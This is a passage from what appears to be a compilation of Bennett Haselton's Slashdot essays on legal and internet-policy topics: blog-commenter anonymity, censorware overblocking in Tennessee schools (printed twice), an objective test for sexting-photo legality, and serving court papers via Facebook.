But what I think is even more important than the correlation of the correct answer with "excellent" math ability, was the significantly lower correlation of the correct answer with "excellent" English skills. I've been saying for years that you can use excellent prose to defend an illogical idea, or you can use poorly crafted prose to defend a good idea, and so if you care about the quality of an idea and its impact on the real world, you have to look at the substance of an argument, not the style. Economics professor Steven Landsburg writes in his forthcoming philosophy book The Big Questions,
The bane of a college professor's existence is the student who has been taught in a writing course that there is such a thing as good writing, independent of having something to say. Students turn in well-organized grammatically correct prose, with the occasional stylistic flourish in lieu of any logical argument, and don't understand why they've earned grades of zero.
I call such people "vocabulemics", who seem to think the purpose of a discussion is to vomit up as many SAT vocab prep words as possible, rather than to form a coherent point. I've tried, and I can't think of any coherent point that could be made in order to argue that the Miley photoshopper really did violate the Tennessee law.
If you're still unconvinced by the results of a survey of mathletes, consider that they do match up well with the comments provided to me by Mark Rasch, a lawyer and computer security specialist with Secure IT Experts and the former head of the Department of Justice Computer Crimes Unit:
First, an image of a minor engaged in simulated sexual activity is not the same as a simulated minor engaged in sexual activity... In other words, if you posed actual minors, nude, and made it look like they were having sex, it would be a crime, even though there was no "actual" sexual activity. In most other contexts, when the legislature says "simulated sexual activity" they mean real people engaged in what appears to be sex. The government is trying to apply this theory to real sex but simulated minors. I don't think that passes statutory muster... it's not what the statute prohibits... Under that rationale, if you had, for example, a picture of two dogs mating, and glued pictures of kids on the dogs' faces, this would be "simulated sexual activity" but would not be prosecutable. Where do you draw the line? Under federal law, you typically draw the line at the use and posing of real kids.
Depending on how you look at it, you may think that this opinion from credentialed expert Mr. Rasch, vindicates the opinion of the math aficionados who voted that the defendant did not violate the law. I think it's the other way around — the fact that this answer was correlated in the survey responses with mathematical ability, vindicates the opinion of Mr. Rasch.
-
Unmasking Blog Commenters Not a Huge Threat To Freedom
Frequent Slashdot contributor Bennett Haselton writes with his take on a recent court decision about the rights of online commenters. "Although a court has ruled that the police can subpoena the identities of users who posted comments in a newspaper's blog, I think this is not as big of a threat to journalistic integrity as it might seem. And in any case when the judge ruled against the privacy rights of 'bloggers,' he didn't actually mean 'bloggers.'" Read on for the rest of Bennett's thoughts.

After writing that a Virginia court made an error in saying that spoofing an IP address in e-mail headers was analogous to using a "pseudonym," and that an Ontario court was wrong in saying that an IP address could be subpoenaed by a court because it was no more secret than personal information like a "home address," I think that the latest court ruling against online anonymity — an Illinois judge ordering a newspaper to reveal the identities of people who posted comments on its blog — is not as big of a threat to online privacy, and is not apparently based on any misconceptions about how the Internet works. However, the ruling has the potential to frighten bloggers more than necessary (as well as possibly set a bad precedent for future courts if they don't read the decision closely enough) because the ruling uses the word "bloggers" repeatedly to refer to what everyone else calls "blog commenters."
Police had asked the Alton Telegraph to reveal the identities of five people who had posted comments in the newspaper's blog which indicated they might have knowledge relevant to an ongoing murder investigation. The newspaper sued to avoid being forced to hand over the commenters' identities, saying that they were "news sources" protected under Illinois's newspaper shield law. Judge Richard Tognarelli ruled that blog commenters did not count as "sources" under the shield law, and allowed the police to go forward in obtaining the identity of two of the commenters, but denied the request to unmask three others, on the grounds that those commenters did not appear to have information relevant to the case.
To consider the relevant questions separately:
Is this legally correct?
Every time I raise a question like this, it provokes the ire of law students and lawyers who say that judges are the real experts on what is legally correct, and it's not appropriate for lay people to comment. As I never tire of saying, if judges are really "experts" in a sense that lay people are not, then it should be possible to put 10 judges in separate rooms, present them with the same facts of the same case, and have most of them independently come to the same conclusion about the correct answer, with a higher degree of accuracy than lay people would be able to reach the same conclusion. If this is not the case, then the judges are not playing the role of "experts" so much as "designated decision-makers," and it's perfectly fair for lay people to analyze whether the judges' reasoning appears correct.
In this case, the judge simply said that blog commenters are not news "sources" in the sense described by the law. The text of the shield law (735 ILCS 5/8-901) defines a "source" as "the person or means from or through which the news or information was obtained." Now, if you were to parse this super-literally, then the blog commenters could be considered "sources" because they are posting "information" which can be "obtained" by the reporters who later go back and read through the blog comments. But if you were to be that literal about it, then anybody who publishes "information" anywhere at all, including someone who posts a timetable of train departure times on their Web page, could be considered a "source" for information used by a reporter. Clearly the legislature did not intend for the term "source" to include all people who publish information anywhere under the sun (just because that information is technically available to reporters just like it's available to everyone else), or they would have said so. So it seems reasonable to assume that when the law refers to sources from whom reporters "obtain information," it refers to the way in which reporters normally obtain information in their role as reporters obtaining information from sources — that is, the source privately communicating with a reporter with some expectation of anonymity, hoping the reporter can use the information provided for research on a future story. Blog commenters do not fit that definition since (a) they are posting publicly, and (b) they are responding to a story that has already been written.
The judge also noted that the shield law is not absolute, and even for individuals who are considered "sources" under the law, their interest in maintaining anonymity has to be weighed against the importance of the information being sought. Judge Tognarelli wrote, "The Telegraph has an interest in protecting its online blogger's identities while the State has an interest in prosecuting someone who has allegedly murdered a child." That sounded to me like sarcasm on first reading, but actually I think he's just being logically rigorous.
So in this case, I think that you really could probably put 10 different judges in separate rooms and present them with the same facts and arguments, and have most of them (although probably not an overwhelming majority) come to the same conclusion. On the other hand, I would bet that you could ask 10 reasonably smart lay people to analyze the case, and about the same proportion of them would come to the same conclusion as well.
Is this logically correct?
By that I mean, could the arguments made in this ruling be extended to a conclusion that is clearly absurd?
Sometimes a ruling can be apparently in line with the law, but would have implications that would be absurd if carried only one step further. For example, in one of my spam cases in Small Claims court where I brought a case on behalf of Peacefire as a Washington corporation that I owned, a judge ruled that I couldn't represent Peacefire because the corporation was a separate legal entity. This would seem to be in line with the legal principle that only lawyers who are licensed to practice law are allowed to represent entities other than themselves; non-lawyers can only represent themselves. But carried one step further, the same principle leads to a conclusion that makes no sense: If corporations cannot be represented in Small Claims court by their owners, then since lawyers are not allowed in Small Claims court either, the logical conclusion would be that corporations cannot be represented by anybody in Small Claims court. By that logic, I (as an individual) could sue a corporation for any reason, and since nobody would be allowed to defend the case, I would have to win by default! Since that conclusion is obviously absurd, at least one of those two rules (the rule against lawyers in Small Claims, or the rule against people in Small Claims representing entities other than themselves) would have to be relaxed, and in the interests of keeping costs down, it makes more sense to let individuals represent corporations that they own. This is probably why every other judge so far has made the opposite ruling, that I am allowed to represent a corporation in Small Claims court if I'm the owner.
Does Judge Tognarelli's ruling lead to any absurd conclusions? I don't think so. In fact, the opposite conclusion could have led to an absurd result, if the judge had ruled that commenters posting on the newspaper's blog could seek protection as "news sources." If blog commenters were protected for comments they posted on the newspaper's blog, why shouldn't they be protected for comments they post on their own Web site somewhere else, since the two situations are logically equivalent? In both cases, you're speaking to the entire world, not providing information privately to a reporter. By extension, anybody who says anything, anywhere, at any time, would be protected as a "news source" if a reporter could later find a record of what that person said. While there are possibly merits to that idea — that all anonymous speakers should be protected from being unmasked — it's clearly not what the legislature meant, since they were legislating protection for "sources," not "everybody."
When the judge said "bloggers," did he mean "bloggers"?
No. This is the biggest flaw in what otherwise appears to be a logically and technically literate ruling: The court repeatedly used "bloggers" to refer to blog commenters:
"The subpoena seeks identifying information for bloggers who voluntarily left comments on the website..."
"Here, it is clear that the 'reporter' did not use any information from the bloggers..."
"The Telegraph has an interest in protecting its online blogger's identities..."
That's fine as long as everybody understands what the judge really meant. However, if an actual blogger — one who publishes quasi-news articles on a blog and could be considered a reporter in the traditional sense — ever has to use the court system to protect their identity from being unmasked, there is a danger that a court could cite the current case as precedent and say that "bloggers don't count as news sources." I would hope that a future court would read the current decision carefully enough to realize that it refers to blog commenters and not actual bloggers, but there's no guarantee.
Is this bad for civil liberties?
It depends. I think that all the court really said was that while bona fide news sources are protected under the shield law, the shield law does not apply to all people who post public information that might potentially be used for a news story someday. That was already the de facto legal situation that most of us were in — if you post something in a public forum that makes the police think you have information that could be relevant to the prosecution of a crime, they can probably get a court to unmask your identity with a subpoena.
It may be tempting to think that courts should interpret the shield law more broadly, but be careful what you wish for — if the shield law got diluted to the point where it applied to everybody, then that increases the chances that courts would carve out more exceptions to it or the legislature would rescind it, since neither the courts nor the legislature generally think that everybody deserves legally guaranteed anonymity all of the time.
If you do think that everybody — or, at least, you — deserves guaranteed anonymity for online postings, you can use tools like Tor to make your identity completely untraceable. I would guess that none of the blog commenters in this case went to that trouble.
In fact, one of the two commenters whose identity was ordered unmasked by the court, used the handle "mrssully." What if that turns out to be a woman whose last name is Sully, and who could have been trivially identified if the police had called the murder defendants' friends and acquaintances and asked, "Hey, who do you think 'Mrs. Sully' is?" The court ruling said that "the Sheriff's Office contacted 117 different individuals regarding the incident" and that "it would be a very expensive and a 'monumental task' to re-interview all of those witnesses." To re-interview all of them, yes. But it would not be a monumental task to have a junior member of the police force call up each of the 117 phone numbers for the witnesses and leave a message saying, "Hey, do you know a 'Mrs. Sully' who is connected to the defendant?" If someone calls back and says Yes, then maybe you've found who you're looking for; if not, then you've only wasted about two hours trying (at sixty seconds per phone number), so go ahead with the subpoena. If it turns out that "Mrs. Sully" is someone who could have been found in this way, then as a taxpayer and as someone who supports law enforcement at least insofar as they're conducting murder investigations, I might reasonably ask why the police didn't do that first.
-
Worst Censorware Blocks Cannot Be Fixed
Slashdot regular Bennett Haselton writes "The ACLU has targeted a group of Tennessee school districts for blocking websites categorized by a blocking company as 'LGBT.' I hope the ACLU wins, but it may create the mistaken impression that egregious overblocking of websites is easy to fix. On the contrary, the vast majority of errors are hard-coded into the products and cannot be fixed by unblocking a single category." Hit that tantalizingly entitled 'Read More' link to read his essay.

The ACLU is threatening to sue a group of Tennessee School Districts for using blocking software that blocks sites categorized as "LGBT" — that is, sites themed around lesbian, gay, bisexual or transgender issues that would not be classified as pornographic. Some of the blocked sites include the Gay and Lesbian Alliance Against Defamation and the Human Rights Campaign.
Legally, the school districts' decision to block these sites seems fairly indefensible. The content being censored is political speech, not illegal to distribute to minors, and as the ACLU points out, by blocking these sites the school districts are engaging in "viewpoint discrimination," since the schools allow access to anti-gay sites like Americans for Truth Against Homosexuality (which, ironically, features a disclaimer saying its content is not suitable for children). But, you never can tell with judges. A judge in Utah once ruled in favor of a school that suspended a student for wearing a t-shirt with the word "Vegan." (Do you think the judge would have made the same ruling if the student's t-shirt had said "Christian"?)
However, while the ACLU would be right to bring this case, there may be another unintended side effect. By focusing on the fact that the "LGBT" category is enabled to be blocked in these districts, this sets up a contrast with districts that do not have the "LGBT" category enabled, which could lead people to think that such districts are not blocking LGBT sites. This is not the case.
When a school district buys blocking software, the software comes with an encrypted list of websites listed in different categories; categories like Pornography and Nudity are typically blocked, while categories like LGBT would usually not be. If a site falls into one or more of the blocked categories, then attempts to access that site will be blocked (at least until some reprobates help you get around the filter.) However, it's the blocking company that decides what to put on the list under each category. And even if only categories like "Pornography" are enabled, there are likely to be many non-pornographic sites categorized as "Pornography," and hence blocked wherever that category is turned on.
When the ACLU of Washington sued the North County Regional Library system for enabling blocking software for all patrons (including adults), they asked me to test the Fortinet Web filter that the library was using. I used a random sample of 100,000 .com and 100,000 .org domains and ran them through an automated script to find 536 .com domains and 207 .org domains that were blocked by Fortinet. Of those, about one out of every eight .com sites categorized as "Pornography" or "Adult Materials," and one out of every four .org sites blocked in those categories, was a site with content that could not possibly be considered "adult" — some of the sites blocked in these categories included the Dabar Worship Center, the immigrant-rights group Families for Freedom, and the Seattle Women's Jazz Orchestra. Extrapolating these ratios to the set of all .com and .org domains in existence, one could conclude that there were about 71,000 non-pornographic .com sites and 5,800 non-pornographic .org sites blocked by Fortinet as "Pornography" or "Adult Materials" — a number almost certain to grow into six figures when you add in all the sites outside of .com and .org. Years earlier, I had run similar tests for Cyber Patrol and SurfWatch (products which have since been discontinued) and found that an absolute majority of sites blocked by each program were actually non-pornographic, which translated into an estimate of hundreds of thousands of .com and .org sites wrongly classified as "porn."
Only the blocking companies know for sure how such stupid mistakes end up on their lists, but the most widely accepted explanation is that they use machines to crawl the Web and guess which sites are pornographic, and add those sites to their blacklists without any human intervention. In their early years, the makers of SurfWatch and Cyber Patrol claimed that employees actually did review sites before adding them to their lists, but that claim became increasingly untenable as more and more reports came out of sites being blocked with no adult content on them.
Nobody has yet done a similar study for the ENA blocking program, but every blocking program that has ever been tested has had a non-trivial error rate that extrapolates to at least hundreds of thousands of non-pornographic websites being blocked under "Pornography" and similar categories. There is no reason to think that the ENA blocker is different; at the very least, if they claim that it is, then the burden of proof should be on them.
So, the ACLU will probably succeed in persuading the Tennessee Schools Cooperative to stop blocking the "LGBT" category, but that doesn't mean that LGBT sites — or any other category of non-pornographic sites — will no longer be blocked. A student who encounters a blocked LGBT site could request an override, but what if they don't want to "out" themselves as someone who was browsing an LGBT site? Is Tennessee the best place to be known as the "queer who wanted to get around the porn filter"? And there may not be an option of getting an override anyway. Some of the correspondents on Peacefire's mailing list for new proxy sites to get around blockers are teachers who aren't given a password to bypass the blocker on their school's computers.
Then of course — you know what's coming — there is the other "larger sense" in which unblocking the LGBT category doesn't "fix the problem," which is that there would be no "problem" if we didn't think of teenagers as children instead of adults. You've probably already decided which side you're on in that debate, but consider it as a scientific question instead of a moral one. Do you think there is any objective evidence that teenagers, if they were given the opportunity to have the same rights and responsibilities as adults, would behave differently from adults to a large degree — more differently than, say, men and women behave from each other? The trouble with the "evidence" that we gather from personal interactions is that it's not truly objective — if someone believes that teenagers are immature and adults are not, they're likely to see and remember only the pieces of evidence that confirm that belief. A true double-blind experiment might involve talking to someone through a computer terminal and rating the other person's "maturity" just based on their responses. That's a start, but the trouble with that experiment is that adults tend to know a larger set of words, so a participant might rate the other person as more "mature" because of their large vocabulary, even though having a large vocabulary is completely different from having mature thoughts or logical reasoning skills. A fairer test might be to take a non-native-English-speaking adult and a native-English-speaking young teenager who scored about the same on a test of English vocabulary, and see if participants could tell the difference in maturity between those two test subjects while talking to them through a computer terminal. I am not aware of any experiment along these lines that has been done, but this is the sort of evidence of differences between adults and minors, that would be truly objective.
Most of the evidence in favor of the innate "adulthood" of teenagers is also anecdotal and not scientific, but it is compelling. As psychologist Robert Epstein has pointed out in The Case Against Adolescence, for thousands of years humans in their early teens were giving birth and raising children of their own. That obviously does not mean that that is a good idea in today's society, it just means that somewhere along the way, we must have lost sight of the level of responsibility that human teenagers are biologically capable of handling. If one of our Stone Age forebears could be brought back to life, he might eventually get used to the Web, but he'd probably always be amused by the idea of Web blockers for teenagers who are older than he was when he was raising his first child.
-
Worst Censorware Blocks Cannot Be Fixed
Slashdot regular Bennett Haselton writes "The ACLU has targeted a group of Tennessee school districts for blocking websites categorized by a blocking company as 'LGBT.' I hope the ACLU wins, but it may create the mistaken impression that egregious overblocking of websites is easy to fix. On the contrary, the vast majority of errors are hard-coded into the products and cannot be fixed by unblocking a single category." Hit that tantalizingly entitled 'Read More' link to read his essay.The ACLU is threatening to sue a group of Tennessee School Districts for using blocking software that blocks sites categorized as "LGBT" — that is, sites themed around lesbian, gay, bisexual or transgender issues that would not be classified as pornographic. Some of the blocked sites include the Gay and Lesbian Alliance Against Defamation and the Human Rights Campaign.
Legally, the school districts' decision to block these sites seems fairly indefensible. The content being censored is political speech, not illegal to distribute to minors, and as the ACLU points out, by blocking these sites the school districts are engaging in "viewpoint discrimination," since the schools allow access to anti-gay sites like Americans for Truth Against Homosexuality (which, ironically, features a disclaimer saying its content is not suitable for children). But, you never can tell with judges. A judge in Utah once ruled in favor of a school that suspended a student for wearing a t-shirt with the word "Vegan." (Do you think the judge would have made the same ruling if the student's t-shirt had said "Christian"?)
However, while the ACLU would be right to bring this case, there may be another unintended side effect. By focusing on the fact that the "LGBT" category is enabled to be blocked in these districts, this sets up a contrast with districts that do not have the "LGBT" category enabled, which could lead people to think that such districts are not blocking LGBT sites. This is not the case.
When a school district buys blocking software, the software comes with an encrypted list of websites listed in different categories; categories like Pornography and Nudity are typically blocked, while categories like LGBT would usually not be. If a site falls into one or more of the blocked categories, then attempts to access that site will be blocked (at least until some reprobates help you get around the filter.) However, it's the blocking company that decides what to put on the list under each category. And even if only categories like "Pornography" are enabled, there are likely to be many non-pornographic sites categorized as "Pornography," and hence blocked wherever that category is turned on.
When the ACLU of Washington sued the North County Regional Library system for enabling blocking software for all patrons (including adults), they asked me to test the Fortinet Web filter that the library was using. I used a random sample of 100,000 .com and 100,000 .org domains and ran them through an automated script to find 536 .com domains and 207 .org domains that were blocked by Fortinet. Of those, about one out of every eight .com sites categorized as "Pornography" or "Adult Materials," and one of out of every four .org sites blocked in those categories, was a site with content that could not possibly be considered "adult" — some of the sites blocked in these categories included the Dabar Worship Center, the immigrant-rights group Families for Freedom, and the Seattle Women's Jazz Orchestra. Extrapolating these ratios to the set of all .com and .org domains in existence, one could conclude that there were about 71,000 non-pornographic .com sites and 5,800 non-pornographic .org sites blocked by FortiNet as "Pornography" or "Adult Materials" — a number almost certain to grow into six figures when you add in all the sites outside of .com and .org. Years earlier, I had run similar tests for Cyber Patrol and SurfWatch (products which have since been discontinued) and found that an absolute majority of sites blocked by each program were actually non-pornographic, which translated into an estimate of hundreds of thousands of .com and .org sites wrongly classified as "porn."
Only the blocking companies know for sure how such stupid mistakes end up on their lists, but the most widely accepted explanation is that they use machines to crawl the Web and guess which sites are pornographic, and add those sites to their blacklists without any human intervention. In their early years, the makers of SurfWatch and Cyber Patrol claimed that employees actually did review sites before adding them to their lists, but that claim became increasingly untenable as more and more reports came out of sites being blocked with no adult content on them.
Nobody has yet done a similar study for the ENA blocking program, but every blocking program that has ever been tested has had a non-trivial error rate that extrapolates to at least hundreds of thousands of non-pornographic websites being blocked under "Pornography" and similar categories. There is no reason to think that the ENA blocker is different; at the very least, if they claim that it is, then the burden of proof should be on them.
So, the ACLU will probably succeed in persuading the Tennessee Schools Cooperative to stop blocking the "LGBT" category, but that doesn't mean that LGBT sites — or any other category of non-pornographic sites — will no longer be blocked. A student who encounters a blocked LGBT site could request an override, but what if they don't want to "out" themselves as someone who was browsing an LGBT site? Is Tennessee the best place to be known as the "queer who wanted to get around the porn filter"? And there may not be an option of getting an override anyway. Some of the correspondents on Peacefire's mailing list for new proxy sites to get around blockers are teachers who aren't given a password to bypass the blocker on their school's computers.
Then of course — you know what's coming — there is the other "larger sense" in which unblocking the LGBT category doesn't "fix the problem," which is that there would be no "problem" if we didn't think of teenagers as children instead of adults. You've probably already decided which side you're on in that debate, but consider it as a scientific question instead of a moral one. Do you think there is any objective evidence that teenagers, if they were given the opportunity to have the same rights and responsibilities as adults, would behave differently from adults to a large degree — more differently than, say, men and women behave from each other? The trouble with the "evidence" that we gather from personal interactions is that it's not truly objective — if someone believes that teenagers are immature and adults are not, they're likely to see and remember only the pieces of evidence that confirm that belief. A true double-blind experiment might involve talking to someone through a computer terminal and rating the other person's "maturity" just based on their responses. That's a start, but the trouble with that experiment is that adults tend to know a larger set of words, so a participant might rate the other person as more "mature" because of their large vocabulary, even though having a large vocabulary is completely different from having mature thoughts or logical reasoning skills. A fairer test might be to take a non-native-English-speaking adult and a native-English-speaking young teenager who scored about the same on a test of English vocabulary, and see if participants could tell the difference in maturity between those two test subjects while talking to them through a computer terminal. I am not aware of any experiment along these lines that has been done, but this is the sort of evidence of differences between adults and minors that would be truly objective.
Most of the evidence in favor of the innate "adulthood" of teenagers is also anecdotal and not scientific, but it is compelling. As psychologist Robert Epstein has pointed out in The Case Against Adolescence, for thousands of years humans in their early teens were giving birth and raising children of their own. That obviously does not mean that that is a good idea in today's society; it just means that somewhere along the way, we must have lost sight of the level of responsibility that human teenagers are biologically capable of handling. If one of our Stone Age forebears could be brought back to life, he might eventually get used to the Web, but he'd probably always be amused by the idea of Web blockers for teenagers who are older than he was when he was raising his first child.
-
Is That "Sexting" Pic Illegal? A Scientific Test
Frequent Slashdot contributor Bennett Haselton writes "Amid the latest 'sexting' controversy, here is a proposal for a scientifically objective method to determine whether a picture constitutes child pornography. This is a harder problem than it seems, but not for the reasons you'd think. And it raises questions about how the same scientific principles could be applied to other matters of law." Hit the link below to read the sextiest story on Slashdot today.
A county district attorney in Pennsylvania has threatened to file felony child pornography charges against three teenage girls for pictures that they took of themselves, even though the girls' lawyers say the pictures are clearly not sexually explicit and do not meet the legal definition of child porn. The American Civil Liberties Union has countered by asking a federal judge to block District Attorney George Skumanick from filing charges.
Skumanick won't show the pictures to anyone, including the girls' lawyers, but according to the reported descriptions, one picture shows two of the girls flashing the peace sign in their bras, and the other picture shows a girl wrapped in a towel with her breasts exposed after stepping out of the shower. Unless there's something very significant being deliberately left out of those descriptions, it sounds pretty obvious that the pictures do not meet the definition of child pornography, which requires sexual explicitness, not just nudity.
Skumanick may even sound like a buffoon for threatening to prosecute the girls over those pictures, but his overreaching is probably an example of the "context syndrome" that I referred to in writing about a Wikipedia article about a CD showing a naked underage girl on the cover. In that article, I wrote:
Suppose you read a news article about a man who was arrested for possession of child pornography, and you happened to see a sample of the images (never mind how) that he was arrested for. And suppose the Virgin Killer album cover photo had been mixed in with those images. Would it have jumped out at you as an obvious case of over-reaching by the police?
In other words, even an obviously legal photo might seem illegal when it's mixed in with a group of photos that constitute actual child porn. According to the AP, Skumanick's office first found the photos in question after confiscating students' cell phones and rounding up 20 students accused of making or distributing the images found on the phones. Some of those other photos were presumably racy enough to meet the definition of child pornography, and Skumanick probably just lumped in the bra and towel pictures into that category without thinking too much about it. Giving him credit, if someone had come to his office and shown him the picture of the towel girl by itself and asked him to prosecute the girl for creating child pornography, he might have said that it didn't meet the legal definition.
But the "context syndrome" only excuses the initial mistake, and only partly. By now, he's had time to think about those particular pictures, and he knows that non-sexually-explicit photos do not constitute child pornography, so what is he doing? He claims that the girls in their bras were posed "provocatively", but that's not the same as sexual explicitness, and he hasn't even made that claim about the towel picture, so unless there's some bombshell piece of information about the photos that he's still keeping secret (and why would he?), there's no excuse for him not to drop the threats of prosecution right away.
But could even the initial mistake have been avoided? I think it could have, if you designed a scientific procedure for deciding, objectively, whether an image meets the legal definition of "child pornography", by borrowing some of the principles used in police lineups.
Now, obviously one big difference between deciding if the right suspect has been identified in a lineup, and deciding whether an image constitutes child pornography, is that the question of a suspect's identity in a lineup is a question about objective reality, while the question of whether an image is "child pornography" is a matter of opinion and consensus about an imprecisely defined English phrase, so it may sound odd to try and find a "scientifically objective" answer. But by "objective", I mean that the procedure should eliminate the influence of factors that are not relevant to the legal definition of child pornography (for example, if asking someone to decide if they think a picture meets the definition, don't tell them whether the photo was found in a pedophile's basement or in a parent's photo album, because under the strict legal definition, that shouldn't matter). And by "scientific", I mean that the Yes/No answers returned by the procedure should be repeatable as far as possible, so that different defendants aren't being tried under wildly different standards, where Bob is convicted of possessing an innocuous photo while Alice is acquitted even though she possessed a racier one.
A naive solution, from a scientific point of view, would be to poll a random sample of lawyers or other professionals in a police go-to database, and ask them to evaluate whether the picture is child pornography, without any information about where the picture came from. These results would be objective (if the respondents didn't know the source of the picture), and would generally be repeatable, if the sample size is large enough. The problem with this method is that while all defendants would be held to the same standard, all citizens would not be. Suppose the lawyers in the go-to list start to decide, as many of them probably would, that anybody who is being prosecuted for possessing a picture of a topless underage girl is probably a pedophile creep anyway, and would start voting "child pornography" for all but the most obviously legal pictures. The prosecutor would realize this, and would know that they could threaten to ruin people's lives by charging them with possession of child pornography because of pictures found in their possession -- even while other members of society possessed similar pictures without ever being charged.
Here's where the analogy to a police lineup comes in. Police lineups are supposed to include "known innocent" candidates in order to test the credibility of the eyewitness; if the eyewitness selects a candidate who could not have possibly committed the crime (because, for example, they were in jail), then the police know the eyewitness is not reliable. (This was one guideline notoriously violated by District Attorney Mike Nifong in the Duke lacrosse team rape trial; he assembled a lineup consisting only of lacrosse team members from the party, so that whomever the eyewitness identified was guaranteed to fall under a cloud of suspicion.) In the same vein, the lawyers or other experts being consulted by the police could be shown a "lineup" of photos, consisting of several photos that were determined in advance to be legal (either because of a prior court ruling, or perhaps just because the D.A. had declined to prosecute the photos on previous occasions), along with the photo whose legality was in question. Ask the experts to pick which photo they think is closest to the definition of child pornography. Unless most of them pick the photo that's on trial, then that photo can't be said to be worse than any of the other photos that had already been deemed legal.
This is closer to a fair solution, but there's still a big loophole. When police assemble candidates for a lineup, they are supposed to pick candidates who match the general physical description given by the eyewitness. If the eyewitness said they were attacked by a redhead, the police can't fill out the lineup with one redheaded suspect that they want to railroad, and 10 blondes. Because attributes like "Caucasian" and "redhead" are pretty straightforward, if the rules for lineups are being enforced properly, the police don't have a lot of wiggle room to fill out the lineup with candidates who blatantly don't match the description. Unfortunately, it would be a lot easier to cheat when creating a "lineup" of photos to compare against a photo whose owner was on trial for possessing child pornography. If the photo at issue is probably legal but still provocative, then the police could fill out the rest of the lineup with completely non-sexual but perhaps eyebrow-raising photos, like a naked teenage girl watering some houseplants. Then when the police ask, "Which of these does not belong?", everybody would pick the provocative one, and the police would take that as "vindication".
The only way I can think of to guard against this, would be to let the defense counsel pick the other photos in the lineup, and then they could pick the most "provocative" ones that were still legal! For any photos that have been declared legal in the past, the defense ought to be able to argue that if an independent panel of experts doesn't think their client's pictures are any worse than those, then their client should not be prosecuted either. (If the defense lawyer decided their client was a child molester and wanted to throw them to the wolves, they could deliberately pick non-sexual photos for the lineup, so that their client's photo gets pegged as the odd one out -- but when the defense lawyer decides to railroad their own client, it's almost impossible for the system to guard against that anyway. Also, it's probably not a good idea to make this an option for child pornography defendants who decide to represent themselves, so that they can rifle through thousands of photographs of naked children, even legal ones, to find the pictures that they think are the "sexiest" to use for their defense.)
Perhaps someone can think of a better method that is still roughly scientific, in the sense of trying everyone according to the same standard and giving repeatable results. The irony is that despite the potential of child pornography charges to destroy a person's life, it is possible in principle to try child pornography cases more objectively than almost any other type of crime, because you can separate out the alleged criminal act from everything else about the defendant, and let people examine the evidence of criminality in isolation. If someone shoots a person and claims it was self-defense, it's hard to imagine how you could distill out only the relevant facts of the case, and pass along just those facts to some third-party observer who then renders a judgment without knowing anything else. Half the courtroom battle is over what facts are "relevant" in the first place. But in the case of a child pornography charge, you can give the photo -- and no other information -- to an expert, and ask them to make a judgment.
I know, I know. The police and prosecutors are not actually going to do this. But that in itself says something. Even if it's not possible to try most crimes in a truly objective fashion, why don't the courts and the police do this when it is possible? Many first-year psychology students who have an intuitive grasp of the principles of sound double-blind testing could probably come up with a procedure better than the one I've described. When you've spent long enough thinking about how to design experiments objectively, you can't even hear about lawyers arguing over whether a photo constitutes child pornography, without the thought popping into your head: "Have a group of experts look at the photo and rate it, independently of each other. Compare the results to a 'control' result where the experts look at a photo that is not child pornography." And so on. Why don't those suggestions ever come from within the legal profession itself?
And on the flip side, what about using scientific methods to examine facts about the legal system? When considering that judges are tasked with evaluating parties' claims in an objective and fair manner, one could ask: Are they really being objective? What are different ways that we could test this? Perhaps by having two actors in different courtrooms on the same day, charged with exactly the same crime under the same circumstances, except one is black and the other is white, and repeat the experiment many times to see if they receive different average sentences. For a scientist, the idea is the most natural thing in the world. Forget the fact that the legal system doesn't do this -- why is virtually nobody in the legal profession even suggesting it?
Probably because most people who think in terms of objective experimental design are drawn towards the hard sciences, not toward law. That's probably a good thing; such people can likely do more good as physicists and research psychologists than they could as lawyers and policemen. But they can still speak out for the principles of science to be applied wherever possible, in any area where objectivity is important -- especially the law.
All true scientists at heart should keep telling the world that "science" is not just a label that encompasses nerd subjects like biology, physics, and chemistry, with other subjects like art and law being "outside the domain of science". While the statements made within the framework of those subjects are not scientific ("This painting is pretty", "The court finds the defendant not liable", etc.), science can make statements about the people in those professions and the patterns in the conclusions that they reach. If art experts are evaluating paintings differently depending on whether they think the paintings come from an art gallery or a 4-year-old's kitchen table, you could find that out through a scientific experiment. If judges are giving an easier time to lawyers than they are to parties who represent themselves, even when they make exactly identical arguments, you could test that hypothesis with an experiment, too. And scientific principles could be used to draw up procedures for trying cases more objectively, as in the procedure for deciding the legality of sexting photographs. We just need to get over the idea that "scientists" should limit themselves to the forensic CSI stuff and then stay away from the legal arena because that's a "separate domain". Science could tell us quite a lot about how fairly justice is dispensed in the courtroom, and sometimes even how to fix the problems.
-
Service Via Facebook Shouldn't Always "Count"
Frequent Slashdot contributor Bennett Haselton writes "A New Zealand court has allowed a plaintiff to serve papers on a defendant via Facebook, following a similar ruling from an Australian court last year. But these rulings do not necessarily mean, as Facebook announced in a press release, that the courts have endorsed Facebook 'as a reliable, secure and private medium for communication.' The trend could lead to abuses if courts start taking 'Facebook service' too seriously." For more of the many words written by Bennett, hop on that curiously named link right below.
A New Zealand court has ruled that a plaintiff can serve papers on a defendant via a message sent to their Facebook account. Last December, an Australian court ruled that a company could serve papers on a couple after failed attempts to reach them by regular mail and e-mail. Facebook responded to the ruling with a statement that said, "We're pleased to see the Australian court validate Facebook as a reliable, secure and private medium for communication. The ruling is also an interesting indication of the increasing role that Facebook is playing in people's lives." I think there are two interesting questions here: (1) Is that really how courts view service via Facebook? And (2) What will happen if courts do begin to view service via Facebook that way?
As to the first question — the court's endorsement of service via Facebook does not mean that they think the service is necessarily secure or reliable. Courts often let you serve papers on a party in a court case via means that are less reliable than normal channels, provided that you've exhausted the more reliable means first. When I was trying to earn my way into heaven by suing spammers in Small Claims court, some states allowed corporations to be served by serving the papers on the Secretary of State in the corporation's home state, but only if you could prove that you had tried and failed to serve the corporation at their registered address. In cases where I served the Secretary of State, it's unlikely that the defendant ever even saw the papers (since the only thing the Secretary of State could do with them was forward them to the defendants' address on file, where I'd already tried to locate them), but it still "counted" because I had exhausted the regular means of serving the documents. Sometimes when serving an individual, if the sheriff couldn't reach someone at home, a judge would sign an order allowing the legal papers to be stuck to their front door (which is neither "secure" nor "reliable"), but only after the sheriff had been unable to deliver it to them in person. So a court's endorsement of Facebook as a means of service doesn't necessarily mean the court thinks that the means of service is reliable. It just means it's a good last resort when conventional methods haven't worked.
